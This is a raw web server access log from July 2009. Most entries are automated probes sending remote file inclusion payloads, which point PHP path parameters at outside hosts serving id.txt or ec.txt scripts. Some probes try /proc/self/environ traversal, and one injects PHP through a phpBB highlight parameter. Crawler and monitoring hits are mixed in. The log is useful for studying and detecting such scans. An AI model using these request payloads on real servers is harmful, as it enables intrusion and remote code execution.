74.223.143.131 - - [18/Jul/2009:04:33:22 -0400] "GET /logs/access_log.Q109051800//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:33:26 -0400] "GET /logs/access_log.Q109053100//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:04:33:29 -0400] "GET ///vwar/backup/errors.php?error=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 222 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:04:33:30 -0400] "GET /logs///vwar/backup/errors.php?error=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 227 "-" "Mozilla/5.0"
59.125.245.181 - - [18/Jul/2009:04:33:30 -0400] "GET /logs/access_log.Q109052400%20%20///vwar/backup/errors.php?error=http://123.242.165.138/backup/export/cvs/id1.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:33:46 -0400] "GET /logs/access_log.Q109062500/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; it; rv:1.8.1) Gecko/20060918 Firefox/2.0"
74.223.143.131 - - [18/Jul/2009:04:34:16 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:34:17 -0400] "GET /logs/access_log.Q109053100%20%20//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:04:34:20 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:04:34:20 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:04:34:20 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:04:34:22 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
74.223.143.131 - - [18/Jul/2009:04:34:26 -0400] "GET /logs/access_log.Q109051800%20%20//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
74.223.143.131 - - [18/Jul/2009:04:34:27 -0400] "GET /logs/access_log.Q109053100%20%20//include.php?path[docroot]=http://www2.risda.gov.my/id2.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
72.30.161.230 - - [18/Jul/2009:04:34:42 -0400] "GET /logs/error_log.Q109060800 HTTP/1.0" 200 2993021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
72.30.161.230 - - [18/Jul/2009:04:34:44 -0400] "GET /logs/error_log.Q109060800 HTTP/1.0" 200 2993021 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
203.57.78.8 - - [18/Jul/2009:04:35:55 -0400] "GET /solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:04:35:55 -0400] "GET /logs/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
203.57.78.8 - - [18/Jul/2009:04:36:12 -0400] "GET /logs/access_log.Q109061400%20%20/solpot.html?body=http://211.179.234.210:8000/design07/user/user/info//fx29id.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:04:36:13 -0400] "GET /logs/voir.php?inc=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 211 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:04:36:13 -0400] "GET /logs/access_log.Q109062300%20%20/voir.php?inc=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:04:36:13 -0400] "GET /voir.php?inc=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 206 "-" "Mozilla/5.0"
124.0.145.1 - - [18/Jul/2009:04:36:29 -0400] "GET /logs/error_log.Q109062300%20%20/voir.php?inc=http://www.seokrim.ms.kr//data/shirohige/zfxid.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
82.195.150.228 - - [18/Jul/2009:04:37:04 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:04 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:04 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:04 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:04 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:04 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:07 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.medchoicefinancial.com/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
82.195.150.228 - - [18/Jul/2009:04:37:08 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.189.18.73 - - [18/Jul/2009:04:37:30 -0400] "GET /logs/access_log.Q109063000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:37:30 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:37:30 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:37:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [18/Jul/2009:04:37:42 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:37:42 -0400] "GET /logs/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:37:42 -0400] "GET /logs/access_log.Q109063000/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
206.41.121.69 - - [18/Jul/2009:04:39:52 -0400] "GET /logs/error_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
206.41.121.69 - - [18/Jul/2009:04:39:57 -0400] "GET /logs/error_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.805"
211.189.18.73 - - [18/Jul/2009:04:40:20 -0400] "GET /logs/access_log.Q109063000%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
125.245.146.253 - - [18/Jul/2009:04:40:27 -0400] "GET /logs/error_log.Q109070700//components/com_fabrik/libs/Blowfish/CBC.php?mosConfig_absolute_path=http://www.thebalvenie.com//files/r0x-id.txt? HTTP/1.1" 404 268 "-" "libwww-perl/5.65"
211.189.18.73 - - [18/Jul/2009:04:40:32 -0400] "GET /logs/access_log.Q109063000%20%20/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 282 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:04:40:52 -0400] "GET /vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 210 "-" "libwww-perl/5.805"
206.225.23.4 - - [18/Jul/2009:04:40:53 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:40:53 -0400] "GET //skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:40:53 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:40:54 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:41:05 -0400] "GET //skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:41:05 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:41:05 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:41:09 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Jul/2009:04:42:36 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
91.142.209.134 - - [18/Jul/2009:04:42:36 -0400] "GET /logs/error_log.Q109052100%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:42:36 -0400] "GET /logs/access_log.Q109052100%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:42:36 -0400] "GET /logs/error_log.Q109052100%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 235 "-" "libwww-perl/5.805"
91.142.209.134 - - [18/Jul/2009:04:42:36 -0400] "GET /logs/access_log.Q109052100%20//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://fbe.trakya.edu.tr/mysqldumper/work/structure/id1.txt?%0D?? HTTP/1.1" 404 236 "-" "libwww-perl/5.805"
66.249.68.247 - - [18/Jul/2009:04:42:52 -0400] "GET /images/nav_store_index.jpg HTTP/1.1" 304 - "-" "Googlebot-Image/1.0"
88.108.218.178 - - [18/Jul/2009:04:43:20 -0400] "GET /images/login_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
88.108.218.178 - - [18/Jul/2009:04:43:21 -0400] "GET /images/psearch_go.gif HTTP/1.1" 200 296 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
88.108.218.178 - - [18/Jul/2009:04:43:22 -0400] "GET /images/login_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
88.108.218.178 - - [18/Jul/2009:04:43:22 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 200 302 "http://www.acesurgical.com/home.html" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-GB; rv:1.9.0.11) Gecko/2009060215 Firefox/3.0.11"
201.232.54.48 - - [18/Jul/2009:04:43:26 -0400] "GET /?REX[INCLUDE_PATH]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 200 409 "-" "libwww-perl/5.805"
61.100.5.136 - - [18/Jul/2009:04:44:07 -0400] "GET /logs/error_log.Q109052300//errors.php?error=http://www.amembersignup.com/signup/AinuLid1.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
61.100.5.136 - - [18/Jul/2009:04:44:07 -0400] "GET //errors.php?error=http://www.amembersignup.com/signup/AinuLid1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
61.100.5.136 - - [18/Jul/2009:04:44:07 -0400] "GET /logs//errors.php?error=http://www.amembersignup.com/signup/AinuLid1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
211.189.18.73 - - [18/Jul/2009:04:44:09 -0400] "GET /logs/access_log.Q109070200/modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.itechwon.co.kr//bbs/include/id1.txt?? HTTP/1.1" 404 280 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:44:24 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:44:24 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:44:35 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Jul/2009:04:44:35 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.dracocafe.pl/sklep/components/com_sef/1.txt? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:45:11 -0400] "GET /default.php?arquivo=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:45:11 -0400] "GET /logs/access_log.Q109062200/default.php?arquivo=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:45:11 -0400] "GET /logs/default.php?arquivo=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:45:11 -0400] "GET /logs/access_log.Q109051400/default.php?arquivo=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
61.100.5.136 - - [18/Jul/2009:04:46:12 -0400] "GET /logs/access_log.Q109052400//errors.php?error=http://www.amembersignup.com/signup/AinuLid1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:46:59 -0400] "GET /logs/access_log.Q109051400%20%20/default.php?arquivo=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:46:59 -0400] "GET /logs/access_log.Q109062200%20%20/default.php?arquivo=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
201.232.54.48 - - [18/Jul/2009:04:47:07 -0400] "GET /logs/access_log.Q109062500/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:04:47:08 -0400] "GET /logs/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 215 "-" "libwww-perl/5.805"
201.232.54.48 - - [18/Jul/2009:04:47:08 -0400] "GET /logs/access_log.Q109062700/vars.inc.php?_SESSION[SCRIPT_PATH]=http://www.desrem.ru/files/ec.txt?? HTTP/1.1" 404 237 "-" "libwww-perl/5.805"
114.4.8.14 - - [18/Jul/2009:04:47:27 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
114.4.8.14 - - [18/Jul/2009:04:47:28 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.79"
114.4.8.14 - - [18/Jul/2009:04:47:29 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.79"
209.59.12.99 - - [18/Jul/2009:04:47:34 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
114.4.8.14 - - [18/Jul/2009:04:47:35 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.79"
114.200.199.144 - - [18/Jul/2009:04:48:31 -0400] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:48:31 -0400] "GET /logs/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:48:31 -0400] "GET /logs/access_log.Q109051600/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:48:37 -0400] "GET /logs/access_log.Q109061900/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 268 "-" "Mozilla/5.0"
211.15.55.45 - - [18/Jul/2009:04:48:50 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:48:50 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:48:51 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:48:53 -0400] "GET /logs/access_log.Q109061900/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:48:54 -0400] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 409 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:48:54 -0400] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 200 9994 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:48:57 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
211.15.55.45 - - [18/Jul/2009:04:49:02 -0400] "GET /logs/access_log.Q109061200/?_SERVER[DOCUMENT_ROOT]=http://www.desrem.ru/files/ec.txt? HTTP/1.1" 404 225 "-" "libwww-perl/5.803"
218.38.136.251 - - [18/Jul/2009:04:50:26 -0400] "GET /logs/access_log.Q109050700//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:50:26 -0400] "GET //main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
72.30.161.230 - - [18/Jul/2009:04:50:31 -0400] "GET /logs/error_log.Q109062100 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
114.200.199.144 - - [18/Jul/2009:04:50:31 -0400] "GET /logs/index.php?cont=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:50:32 -0400] "GET /index.php?cont=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
114.200.199.144 - - [18/Jul/2009:04:50:32 -0400] "GET /logs/access_log.Q109051400/index.php?cont=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
218.145.31.242 - - [18/Jul/2009:04:50:32 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 247 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
218.145.31.242 - - [18/Jul/2009:04:50:32 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 242 "-" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)"
218.145.31.242 - - [18/Jul/2009:04:50:33 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/3.0 (OS/2; U)"
218.145.31.242 - - [18/Jul/2009:04:50:33 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/3.0 (OS/2; U)"
218.145.31.242 - - [18/Jul/2009:04:50:34 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 242 "-" "XXXXXX"
218.145.31.242 - - [18/Jul/2009:04:50:34 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 247 "-" "XXXXXX"
218.145.31.242 - - [18/Jul/2009:04:50:34 -0400] "GET /public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 242 "-" "XXXXXX"
218.145.31.242 - - [18/Jul/2009:04:50:34 -0400] "GET /logs/public_includes/pub_blocks/activecontent.php?vsDragonRootPath=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 247 "-" "XXXXXX"
218.38.136.251 - - [18/Jul/2009:04:50:42 -0400] "GET /logs//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
114.200.199.144 - - [18/Jul/2009:04:50:53 -0400] "GET /logs/access_log.Q109051600%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:04:50:56 -0400] "GET //main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:50:56 -0400] "GET /logs//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:50:56 -0400] "GET /logs/access_log.Q109050700//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
114.200.199.144 - - [18/Jul/2009:04:51:00 -0400] "GET /logs/access_log.Q109061900%20%20/components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://wiach.net/pokeh/id1.txt? HTTP/1.1" 404 270 "-" "Mozilla/5.0"
218.38.136.251 - - [18/Jul/2009:04:51:05 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:51:07 -0400] "GET /logs/access_log.Q109050700//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:51:07 -0400] "GET //main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 207 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:51:10 -0400] "GET /logs//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 212 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:51:31 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
218.38.136.251 - - [18/Jul/2009:04:51:35 -0400] "GET /logs/access_log.Q109051800//main.php?appserv_root=http://220.130.180.180/id/ManieZ.jpg???? HTTP/1.1" 404 234 "-" "libwww-perl/5.65"
208.80.195.47 - - [18/Jul/2009:04:52:06 -0400] "GET / HTTP/1.0" 200 409 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; OptusNetDSL6; .NET CLR 1.1.4322; InfoPath.1)"
209.59.12.99 - - [18/Jul/2009:04:52:35 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
211.189.18.73 - - [18/Jul/2009:04:52:52 -0400] "GET /modules/icontent/include/wysiwyg/spaw_control.class.php?spaw_root=http://www.2u264.com/bbs//include/idi.txt???? HTTP/1.1" 404 253 "-" "libwww-perl/5.79"
